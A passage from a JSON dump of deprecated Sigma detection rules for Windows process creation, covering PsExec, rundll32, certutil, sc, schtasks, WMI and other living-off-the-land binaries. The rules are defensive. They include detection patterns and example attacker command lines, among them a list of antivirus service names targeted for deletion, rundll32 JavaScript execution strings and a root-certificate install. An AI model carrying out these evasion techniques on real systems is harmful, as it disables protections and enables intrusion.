    "content": "title: Renamed PsExec\nid: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2\nstatus: deprecated\ndescription: Detects the execution of a renamed PsExec often used by attackers or malware\nreferences:\n    - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks\nauthor: Florian Roth (Nextron Systems)\ndate: 2019/05/21\nmodified: 2023/03/04\ntags:\n    - car.2013-05-009\n    - attack.defense_evasion\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Description: 'Execute processes remotely'\n        Product: 'Sysinternals PsExec'\n    filter:\n        Image|endswith:\n            - '\\PsExec.exe'\n            - '\\PsExec64.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Software that illegaly integrates PsExec in a renamed form\n    - Administrators that have renamed PsExec and no one knows why\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_renamed_rundll32.yml",
    "content": "title: Renamed Rundll32.exe Execution\nid: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2\nstatus: deprecated\ndescription: Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection\nreferences:\n    - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/06/08\nmodified: 2023/01/18\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'RUNDLL32.EXE'\n    filter:\n        Image|endswith: '\\rundll32.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_root_certificate_installed.yml",
    "content": "title: Root Certificate Installed\nid: 46591fae-7a4c-46ea-aec3-dff5e6d785dc\nrelated:\n    - id: 42821614-9264-4761-acfc-5772c3286f76\n      type: derived\nstatus: deprecated\ndescription: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\nauthor: 'oscd.community, @redcanary, Zach Stanford @svch0st'\ndate: 2020/10/10\nmodified: 2023/03/05\ntags:\n    - attack.defense_evasion\n    - attack.t1553.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\certutil.exe'     # Example: certutil -addstore -f -user ROOT CertificateFileName.der\n        CommandLine|contains|all:\n            - '-addstore'\n            - 'root'\n    selection2:\n        Image|endswith: '\\CertMgr.exe'      # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all\n        CommandLine|contains|all:\n            - '/add'\n            - 'root'\n    condition: selection1 or selection2\nfalsepositives:\n    - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_run_from_zip.yml",
    "content": "title: Run from a Zip File\nid: 1a70042a-6622-4a2b-8958-267625349abf\nstatus: deprecated\ndescription: Payloads may be compressed, archived, or encrypted in order to avoid detection\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file\nauthor: frack113\ndate: 2021/12/26\nmodified: 2023/03/05\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains: '.zip\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_rundll32_js_runhtmlapplication.yml",
    "content": "title: Rundll32 JS RunHTMLApplication Pattern\nid: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3\nstatus: deprecated\ndescription: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code\nreferences:\n    - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt\n    - https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-14\nmodified: 2024-02-23\ntags:\n    - attack.defense_evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains|all:\n            - 'rundll32'\n            - 'javascript'\n            - '..\\..\\mshtml,'\n            - 'RunHTMLApplication'\n    selection2:\n        CommandLine|contains: ';document.write();GetObject(\"script'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_rundll32_script_run.yml",
    "content": "title: Suspicious Rundll32 Script in CommandLine\nid: 73fcad2e-ff14-4c38-b11d-4172c8ac86c7\nstatus: deprecated\ndescription: Detects suspicious process related to rundll32 based on arguments\nreferences:\n    - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52\n    - https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md\nauthor: frack113, Zaw Min Htun (ZETA)\ndate: 2021/12/04\nmodified: 2024/02/23\ntags:\n    - attack.defense_evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: 'rundll32'\n    selection2:\n        CommandLine|contains:\n            - 'mshtml,RunHTMLApplication'\n            - 'mshtml,#135'\n    selection3:\n        CommandLine|contains:\n            - 'javascript:'\n            - 'vbscript:'\n    condition: all of selection*\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_sc_delete_av_services.yml",
    "content": "title: Suspicious Execution of Sc to Delete AV Services\nid: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b\nstatus: deprecated\ndescription: Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection\nreferences:\n    - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/08/01\nmodified: 2023/03/04\ntags:\n    - attack.execution\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains: ' delete '\n    selection_av_process:\n        CommandLine|contains:\n            # Delete Service 'AVG'\n            - 'AvgAdminServer'\n            - 'AVG Antivirus'\n            - 'MBEndpointAgent'\n            # Delete Service 'Malwarebytes'\n            - 'MBAMService'\n            - 'MBCloudEA'\n            - 'avgAdminClient'\n            # Delete Service 'Sophos'\n            - 'SAVService'\n            - 'SAVAdminService'\n            - 'Sophos AutoUpdate Service'\n            - 'Sophos Clean Service'\n            - 'Sophos Device Control Service'\n            - 'Sophos File Scanner Service'\n            - 'Sophos Health Service'\n            - 'Sophos MCS Agent'\n            - 'Sophos MCS Client'\n            - 'SntpService'\n            - 'swc_service'\n            - 'swi_service'\n            - 'Sophos UI'\n            - 'swi_update'\n            - 'Sophos Web Control Service'\n            - 'Sophos System Protection Service'\n            - 'Sophos Safestore Service'\n            - 'hmpalertsvc'\n            - 'RpcEptMapper'\n            - 'Sophos Endpoint Defense Service'\n            - 'SophosFIM'\n            - 'swi_filter'\n            # Delete Service 'FireBird'\n            - 
'FirebirdGuardianDefaultInstance'\n            - 'FirebirdServerDefaultInstance'\n            # Delete Service 'Webroot'\n            - 'WRSVC'\n            # Delete Service 'ESET'\n            - 'ekrn'\n            - 'ekrnEpsw'\n            # Delete Service 'Kaspersky'\n            - 'klim6'\n            - 'AVP18.0.0'\n            - 'KLIF'\n            - 'klpd'\n            - 'klflt'\n            - 'klbackupdisk'\n            - 'klbackupflt'\n            - 'klkbdflt'\n            - 'klmouflt'\n            - 'klhk'\n            - 'KSDE1.0.0'\n            - 'kltap'\n            # Delete Service 'Quick Heal'\n            - 'ScSecSvc'\n            - 'Core Mail Protection'\n            - 'Core Scanning Server'\n            - 'Core Scanning ServerEx'\n            - 'Online Protection System'\n            - 'RepairService'\n            - 'Core Browsing Protection'\n            - 'Quick Update Service'\n            # Delete Service 'McAfee'\n            - 'McAfeeFramework'\n            - 'macmnsvc'\n            - 'masvc'\n            - 'mfemms'\n            - 'mfevtp'\n            # Delete Service 'Trend Micro'\n            - 'TmFilter'\n            - 'TMLWCSService'\n            - 'tmusa'\n            - 'TmPreFilter'\n            - 'TMSmartRelayService'\n            - 'TMiCRCScanService'\n            - 'VSApiNt'\n            - 'TmCCSF'\n            - 'tmlisten'\n            - 'TmProxy'\n            - 'ntrtscan'\n            - 'ofcservice'\n            - 'TmPfw'\n            - 'PccNTUpd'\n            # Delete Service 'Panda'\n            - 'PandaAetherAgent'\n            - 'PSUAService'\n            - 'NanoServiceMain'\n            - 'EPIntegrationService'\n            - 'EPProtectedService'\n            - 'EPRedline'\n            - 'EPSecurityService'\n            - 'EPUpdateService'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_schtasks_user_temp.yml",
    "content": "title: Suspicious Add Scheduled Task From User AppData Temp\nid: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8\nstatus: deprecated\ndescription: schtasks.exe create task from user AppData\\Local\\Temp\nreferences:\n    - malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04\nauthor: frack113\ndate: 2021/11/03\nmodified: 2023/03/14\ntags:\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    schtasks:\n        Image|endswith: '\\schtasks.exe'\n    option:\n        CommandLine|contains|all:\n            - '/Create '\n            - '\\AppData\\Local\\Temp'\n    filter_klite_codec:\n        CommandLine|contains|all:\n            - '/Create /TN \"klcp_update\" /XML '\n            - '\\klcp_update_task.xml'\n    condition: schtasks and option and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_service_stop.yml",
    "content": "title: Stop Windows Service\nid: eb87818d-db5d-49cc-a987-d5da331fbd90\nstatus: deprecated\ndescription: Detects a Windows service to be stopped\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali\ndate: 2019/10/23\nmodified: 2023/03/05\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc_net_img:\n        - OriginalFileName:\n            - 'sc.exe'\n            - 'net.exe'\n            - 'net1.exe'\n        - Image|endswith:\n            - '\\sc.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n    selection_sc_net_cli:\n        CommandLine|contains: ' stop '\n    selection_pwsh:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains: 'Stop-Service '\n    filter:\n        CommandLine:\n             - 'sc  stop KSCWebConsoleMessageQueue' # kaspersky Security Center Web Console double space between sc and stop\n             - 'sc  stop LGHUBUpdaterService' # Logitech LGHUB Updater Service\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: (all of selection_sc_net* and not filter) or selection_pwsh\nfields:\n    - ComputerName\n    - User\n    - CommandLine\nfalsepositives:\n    - Administrator shutting down the service due to upgrade or removal purposes\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_bitstransfer.yml",
    "content": "title: Suspicious Bitstransfer via PowerShell\nid: cd5c8085-4070-4e22-908d-a5b3342deb74\nstatus: deprecated\ndescription: Detects transferring files from system on a server bitstransfer Powershell cmdlets\nreferences:\n    - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps\nauthor: Austin Songer @austinsonger\ndate: 2021/08/19\nmodified: 2023/01/10\ntags:\n    - attack.exfiltration\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'Get-BitsTransfer'\n            - 'Add-BitsFile'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_cmd_exectution_via_wmi.yml",
    "content": "title: Suspicious Cmd Execution via WMI\nid: e31f89f7-36fb-4697-8ab6-48823708353b\nstatus: deprecated\ndescription: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html\nauthor: Tim Rauch\ndate: 2022/09/27\nmodified: 2023/01/19\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        ParentImage|endswith: '\\WmiPrvSE.exe'\n        CommandLine|contains: '\\\\\\\\127.0.0.1\\\\'\n    selection_opt:\n        CommandLine|contains:\n            - '2>&1'\n            - '1>'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_commandline_chars.yml",
    "content": "title: Suspicious Characters in CommandLine\nid: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9\nstatus: deprecated\ndescription: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion\nreferences:\n    - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/04/27\nmodified: 2023/03/03\ntags:\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_spacing_modifiers:\n        CommandLine|contains: # spacing modifier letters that get auto-replaced\n            - 'ˣ' # 0x02E3\n            - '˪' # 0x02EA\n            - 'ˢ' # 0x02E2\n    selection_unicode_slashes: # forward slash alternatives\n        CommandLine|contains:\n            - '∕' # 0x22FF\n            - '⁄' # 0x206F\n    selection_unicode_hyphens: # hyphen alternatives\n        CommandLine|contains:\n            - '―' # 0x2015\n            - '—' # 0x2014\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_lolbin_non_c_drive.yml",
    "content": "title: Wscript Execution from Non C Drive\nid: 5b80cf53-3a46-4adc-960b-05ec19348d74\nstatus: deprecated\ndescription: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.\nreferences:\n    - https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt\n    - https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/\nauthor: Aaron Herman\ndate: 2022/10/01\nmodified: 2023/08/29\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_lolbin:\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    selection_exetensions:\n        CommandLine|contains:\n            - '.js'\n            - '.vbs'\n            - '.vbe'\n    selection_drive_path:\n        CommandLine|contains: ':\\'\n    filter_drive_path:\n        CommandLine|contains:\n            - ' C:\\\\'\n            - \" 'C:\\\\\"\n            - ' \"C:\\\\'\n    filter_env_vars:\n        CommandLine|contains: '%'\n    filter_unc_paths:\n        CommandLine|contains: ' \\\\\\\\'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate scripts located on other partitions such as \"D:\"\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_run_folder.yml",
    "content": "title: Process Start From Suspicious Folder\nid: dca91cfd-d7ab-4c66-8da7-ee57d487b35b\nstatus: deprecated\ndescription: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files\nreferences:\n    - Malware sandbox results\nauthor: frack113\ndate: 2022/02/11\nmodified: 2022/11/03\ntags:\n    - attack.execution\n    - attack.t1204\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\Desktop\\'\n            - '\\Temp\\'\n            - '\\Temporary Internet'\n    filter_parent:\n        - ParentImage:\n            - 'C:\\Windows\\System32\\cleanmgr.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\resources\\app\\ServiceHub\\Services\\Microsoft.VisualStudio.Setup.Service\\BackgroundDownload.exe'\n            - 'C:\\Windows\\System32\\dxgiadaptercache.exe'\n        - ParentImage|startswith: 'C:\\Program Files (x86)\\NVIDIA Corporation\\'\n    filter_other:\n        Image|endswith: 'setup.exe'  # the missing \\ at the beginning is intended - to cover e.g. MySoftwareSetup.exe as well\n    filter_edge:\n        Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\Temp\\'\n        Image|endswith: '.tmp\\MicrosoftEdgeUpdate.exe'\n        #OriginalFileName: msedgeupdate.dll\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Installers are expected to be run from the \"AppData\\Local\\Temp\" and \"C:\\Windows\\Temp\\\" directories\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_squirrel_lolbin.yml",
    "content": "title: Squirrel Lolbin\nid: fa4b21c9-0057-4493-b289-2556416ae4d7\nstatus: deprecated\ndescription: Detects Possible Squirrel Packages Manager as Lolbin\nreferences:\n    - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/\n    - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/\nauthor: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community\ndate: 2019/11/12\nmodified: 2023/02/14\ntags:\n    - attack.execution\n    - attack.defense_evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\update.exe'\n    selection2:\n        CommandLine|contains:\n            - '--processStart'\n            - '--processStartAndWait'\n            - '--createShortcut'\n    filter_discord:\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Discord\\Update.exe'\n            - ' --processStart'\n            - 'Discord.exe'\n    filter_github_desktop:\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\GitHubDesktop\\Update.exe'\n            - 'GitHubDesktop.exe'\n        CommandLine|contains:\n            - '--createShortcut'\n            - '--processStartAndWait'\n    filter_teams:\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n            - 'Teams.exe'\n        CommandLine|contains:\n            - '--processStart'\n            - '--createShortcut'\n    condition: all of selection* and not 1 of filter_*\nfalsepositives:\n    - 1Clipboard\n    - Beaker Browser\n    - Caret\n    - Collectie\n    - Discord\n    - Figma\n    - Flow\n    - Ghost\n    - GitHub Desktop\n    - GitKraken\n    - Hyper\n    - Insomnia\n    - JIBO\n    - Kap\n    - Kitematic\n    - Now Desktop\n    - Postman\n    - PostmanCanary\n    - 
Rambox\n    - Simplenote\n    - Skype\n    - Slack\n    - SourceTree\n    - Stride\n    - Svgsus\n    - WebTorrent\n    - WhatsApp\n    - WordPress.com\n    - Atom\n    - Gitkraken\n    - Slack\n    - Teams\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_sysinternals_psexec_service_execution.yml",
    "content": "title: PsExec Tool Execution\nid: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba\nrelated:\n    - id: 42c575ea-e41e-41f1-b248-8093c3e82a28\n      type: derived\nstatus: deprecated\ndescription: Detects PsExec service execution via default service image name\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017/06/12\nmodified: 2023/02/28\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\PSEXESVC.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection\nfields:\n    - EventID\n    - CommandLine\n    - ParentCommandLine\n    - ServiceName\n    - ServiceFileName\n    - TargetFilename\n    - PipeName\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_sysinternals_psexesvc_start.yml",
    "content": "title: PsExec Service Start\nid: 3ede524d-21cc-472d-a3ce-d21b568d8db7\nstatus: deprecated\ndescription: Detects a PsExec service start\nauthor: Florian Roth (Nextron Systems)\ndate: 2018/03/13\nmodified: 2023/02/28\ntags:\n    - attack.execution\n    - attack.s0029\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine: C:\\Windows\\PSEXESVC.exe\n    condition: selection\nfalsepositives:\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_whoami_as_system.yml",
    "content": "title: Run Whoami as SYSTEM\nid: 80167ada-7a12-41ed-b8e9-aa47195c66a1\nstatus: deprecated\ndescription: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\nauthor: Teymur Kheirkhabarov, Florian Roth\ndate: 2019/10/23\nmodified: 2023/02/28\ntags:\n    - attack.privilege_escalation\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_img:\n        - OriginalFileName: 'whoami.exe'\n        - Image|endswith: '\\whoami.exe'\n    condition: all of selection*\nfalsepositives:\n    - Possible name overlap with NT AUHTORITY substring to cover all languages\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_whoami_execution.yml",
    "content": "title: Whoami Utility Execution\nid: e28a5a99-da44-436d-b7a0-2afc20a5f413\nstatus: deprecated # Deprecated in favor of 502b42de-4306-40b4-9596-6f590c81f073\ndescription: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-08-13\nmodified: 2025-10-20\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    condition: selection\nfalsepositives:\n    - Admin activity\n    - Scripts and administrative tools used in the monitored environment\n    - Monitoring activity\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_winword_dll_load.yml",
    "content": "title: Winword.exe Loads Suspicious DLL\nid: 2621b3a6-3840-4810-ac14-a02426086171\nstatus: deprecated\ndescription: Detects Winword.exe loading a custom DLL using the /l flag\nauthor: Victor Sergeev, oscd.community\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/\ndate: 2020/10/09\nmodified: 2022/07/25\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\winword.exe'\n        CommandLine|contains: '/l'\n    condition: selection\nfields:\n    - CommandLine\nfalsepositives:\n    - Unknown\nlevel: medium\ntags:\n    - attack.defense_evasion\n    - attack.t1202\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_wmic_execution_via_office_process.yml",
    "content": "title: WMI Execution Via Office Process\nid: 518643ba-7d9c-4fa5-9f37-baed36059f6a\nrelated:\n    - id: e1693bc8-7168-4eab-8718-cdcaa68a1738\n      type: derived\n    - id: 438025f9-5856-4663-83f7-52f878a70a50\n      type: similar\nstatus: deprecated\ndescription: Initial execution of malicious document calls wmic to execute the file with regsvr32\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)\ndate: 2021/08/23\nmodified: 2023/02/04\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_parent:\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_wmic_remote_command.yml",
    "content": "title: WMI Remote Command Execution\nid: e42af9df-d90b-4306-b7fb-05c863847ebd\nstatus: deprecated\ndescription: An adversary might use WMI to execute commands on a remote system\nreferences:\n    - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/\n    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113\ndate: 2022/03/13\nmodified: 2023/02/14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/node:'\n            - 'process'\n            - 'call'\n            - 'create'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_wmic_remote_service.yml",
    "content": "title: WMI Reconnaissance List Remote Services\nid: 09af397b-c5eb-4811-b2bb-08b3de464ebf\nstatus: deprecated\ndescription: |\n    An adversary might use WMI to check if a certain Remote Service is running on a remote device.\n    When the test completes, a service information will be displayed on the screen if it exists.\n    A common feedback message is that \"No instance(s) Available\" if the service queried is not running.\n    A common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md\n    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113\ndate: 2022/01/01\nmodified: 2023/02/14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/node:'\n            - 'service'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_wuauclt_execution.yml",
    "content": "title: Windows Update Client LOLBIN\nid: d7825193-b70a-48a4-b992-8b5b3015cc11\nstatus: deprecated\ndescription: Detects code execution via the Windows Update client (wuauclt)\nreferences:\n    - https://dtm.uk/wuauclt/\nauthor: FPT.EagleEye Team\ndate: 2020/10/17\nmodified: 2023/11/11\ntags:\n    - attack.command_and_control\n    - attack.defense_evasion\n    - attack.t1105\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\wuauclt.exe'\n        - OriginalFileName: 'wuauclt.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/UpdateDeploymentProvider'\n            - '/RunHandlerComServer'\n            - '.dll'\n    filter:\n        CommandLine|contains:\n            - ' /ClassId '\n            - ' wuaueng.dll '\n    condition: all of selection* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/process_creation_syncappvpublishingserver_exe.yml",
    "content": "title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction\nid: fde7929d-8beb-4a4c-b922-be9974671667\ndescription: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: 'Ensar Şamil, @sblmsrsn, OSCD Community'\ndate: 2020/10/05\nmodified: 2022/04/11\ntags:\n    - attack.defense_evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\SyncAppvPublishingServer.exe'\n    condition: selection\nfalsepositives:\n    - App-V clients\nlevel: medium\nstatus: deprecated"
  },
  {
    "path": "deprecated/windows/registry_add_sysinternals_sdelete_registry_keys.yml",
